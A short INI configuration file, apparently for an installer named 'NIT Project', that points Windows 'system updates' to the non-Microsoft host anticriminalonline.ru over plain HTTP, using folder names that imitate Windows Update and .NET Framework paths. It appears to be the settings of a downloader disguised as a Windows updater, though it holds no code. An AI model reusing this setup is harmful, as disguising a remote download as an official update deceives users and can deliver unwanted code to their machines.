# INI File For Windows System Updates for NIT Project Installer

# Main Installation Hosts

httphost=anticriminalonline.ru
httpMainFolder=WinUpdate/WindowsMainUpdate/NET-Framework
httppref=http
httpport=80
httpuser=
httppassword=
